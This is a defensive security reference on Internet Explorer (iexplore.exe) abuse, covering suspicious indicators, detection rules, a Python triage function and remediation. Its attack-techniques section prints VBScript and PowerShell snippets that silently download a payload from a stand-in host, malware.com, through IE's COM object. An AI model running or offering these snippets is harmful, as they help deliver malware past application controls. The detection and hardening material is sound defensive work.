iexplore.exe - Internet Explorer Security Analysis
iexplore.exe is **Microsoft Internet Explorer**, a legacy browser officially retired but still present on Windows systems. IE's **legacy COM interfaces** and **poor security model** make it a **favorite target for malware**. Attackers abuse iexplore.exe for **COM-based downloads**, **process injection**, and leveraging its trusted status to bypass application controls.
Risk Summary
CRITICAL priority for SOC triage. iexplore.exe is deprecated but still exploited. Its presence in modern attack chains usually indicates **malicious activity**. Monitor for unexpected launches, especially from cmd.exe/powershell.exe, and its use for downloading files via COM automation.
Overview
What is iexplore.exe?
iexplore.exe is Microsoft Internet Explorer, a legacy web browser that has been officially retired.
History
- Retirement: June 2022 (Win 10), earlier for Win 11
- Still Present: Exists on Windows for compatibility
- Replaced By: Microsoft Edge
Why Still Relevant
Attacker Value:
- Pre-installed on Windows
- Trusted Microsoft binary
- COM automation capabilities
- Legacy vulnerabilities
Security Significance
- Deprecated Security: No longer receiving full updates
- COM Exploitation: Heavily abused for downloads
- Process Injection Target: Common injection host
- Application Control Bypass: Trusted binary status
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Program Files\Internet Explorer\iexplore.exe |
| Parent | explorer.exe (rare, legitimate) |
| Instances | Usually 0 (deprecated) |
| User | Logged-in user |
| Network | Should be rare/none |
Modern Reality
In modern environments, iexplore.exe running is unusual and warrants investigation.
⚠️ iexplore.exe activity in 2024+ is suspicious by default
Legacy Process Model
iexplore.exe (frame process)
└── iexplore.exe (tab process, optional)
Common Locations
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
Suspicious Indicators
Legitimate vs Suspicious
LEGITIMATE (Rare)
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent: explorer.exe
User: Logged-in user
Context: Legacy application requirement
SUSPICIOUS (Common)
Path: C:\Temp\iexplore.exe
Parent: cmd.exe, powershell.exe, wscript.exe
User: SYSTEM (unexpected)
Context: No business justification for IE use
Behavior: Downloading files, visiting unknown URLs
Default Assumption
| Context | Assumption | Action |
|---|---|---|
| Server | SUSPICIOUS | Investigate |
| Modern Workstation | SUSPICIOUS | Investigate |
| Legacy App Requirement | Verify | Document exception |
| Automated Launch | MALICIOUS | Contain immediately |
Abuse Techniques
Attack Techniques
Technique #1: COM-Based Download (T1105)
Malicious Download via COM:
' VBScript using IE COM object
Set ie = CreateObject("InternetExplorer.Application")
ie.Visible = False
ie.Navigate "http://malware.com/payload.exe"
Do While ie.Busy : WScript.Sleep 100 : Loop
PowerShell Variant:
$ie = New-Object -ComObject InternetExplorer.Application
$ie.Visible = $false
$ie.Navigate("http://malware.com/payload.exe")
Technique #2: Living-off-the-Land
Using IE for C2:
- Trusted binary status
- Legitimate network behavior
- Bypasses application whitelisting
Technique #3: Process Injection Target (T1055)
Malware injects into iexplore.exe because:
- Trusted process
- Expected to have network activity
- Often allowed through firewalls
Technique #4: Browser Pivoting (T1185)
Injecting into IE to:
- Steal session cookies
- Perform actions as user
- Access authenticated web applications
Detection Guidance
Detection Strategies
Priority #1: Any IE Execution (Modern Systems)
Process = "iexplore.exe"
→ ALERT: HIGH - IE deprecated, investigate
PowerShell Check:
Get-Process iexplore -ErrorAction SilentlyContinue | ForEach-Object {
    Write-Warning "IE RUNNING - Investigate: PID $($_.Id)"
    Get-WmiObject Win32_Process -Filter "ProcessId=$($_.Id)" |
        Select-Object ProcessId, ParentProcessId, CommandLine
}
Priority #2: Automated/Script Launch
Process = "iexplore.exe" AND
Parent IN ["cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"]
→ ALERT: CRITICAL - Likely malicious
Priority #3: COM Object Creation
ScriptEngine CREATES "InternetExplorer.Application"
→ ALERT: HIGH - IE COM automation
Priority #4: Hidden Window
Process = "iexplore.exe" AND
WindowVisible = false
→ ALERT: CRITICAL - Hidden IE instance
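The priorities above, combined with the path, parent and user indicators from the Legitimate vs Suspicious list, as a triage function over process-creation records. This is an added example, not code from the original page. The event field names, the sample events, the HIGH rating for SYSTEM and the `-Embedding` command-line check (the switch iexplore.exe is started with when it is activated through COM) are assumptions of this example.

```python
import ntpath

# Paths and parent names come from the page; field names are assumptions.
EXPECTED_PATHS = {
    r"c:\program files\internet explorer\iexplore.exe",
    r"c:\program files (x86)\internet explorer\iexplore.exe",
}
SCRIPT_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
RANK = {"HIGH": 1, "CRITICAL": 2}


def triage(event):
    """Return (severity, reasons) for a process-creation record, None if not IE."""
    image = event["image"].lower()
    if ntpath.basename(image) != "iexplore.exe":
        return None
    findings = [("HIGH", "IE is deprecated, execution needs a justification")]
    if image not in EXPECTED_PATHS:
        findings.append(("CRITICAL", "binary outside the IE install directory"))
    parent = ntpath.basename(event.get("parent_image", "")).lower()
    if parent in SCRIPT_PARENTS:
        findings.append(("CRITICAL", "launched by " + parent))
    # Assumption: COM activation starts iexplore.exe with -Embedding
    if "-embedding" in event.get("command_line", "").lower():
        findings.append(("HIGH", "started through COM activation"))
    # Assumption: the page calls SYSTEM unexpected; rated HIGH here
    if event.get("user", "").upper().endswith("SYSTEM"):
        findings.append(("HIGH", "running as SYSTEM"))
    severity = max((s for s, _ in findings), key=RANK.get)
    return severity, [reason for _, reason in findings]


# Constructed sample events, not real telemetry
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": IE, "parent_image": r"C:\Windows\explorer.exe", "user": r"CORP\alice"},
    {"image": IE, "parent_image": PS, "user": r"CORP\alice"},
    {"image": r"C:\Temp\iexplore.exe", "parent_image": r"C:\Windows\System32\wscript.exe",
     "user": r"NT AUTHORITY\SYSTEM"},
    {"image": IE, "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": '"' + IE + '" -Embedding', "user": r"CORP\alice"},
    {"image": r"C:\Windows\notepad.exe", "parent_image": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["image"], "->", triage(ev))
```

The fourth constructed event models a COM-activated instance, whose parent is the DCOM launcher service rather than the script host; the Priority #2 parent rule alone does not flag it.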
Remediation Steps
Protection and Remediation
Defense: Disable Internet Explorer
Via DISM:
dism /online /Disable-Feature /FeatureName:Internet-Explorer-Optional-amd64 /NoRestart
Via Group Policy:
Computer Configuration → Administrative Templates →
Windows Components → Internet Explorer →
Disable Internet Explorer 11 as a standalone browser
Defense: Application Control
Block iexplore.exe execution except for documented exceptions.
If Compromise Suspected
- Terminate all iexplore.exe processes
- Identify parent process chain
- Check for downloaded files
- Review IE history/cache
- Scan for persistence mechanisms
- Check for COM object abuse
Investigation Checklist
- Determine business justification for IE usage
- Identify parent process launching IE
- Check if window is visible or hidden
- Review command line arguments
- Examine network connections
- Check IE history and cache
- Look for downloaded files
- Scan for process injection
- Verify no scheduled tasks launching IE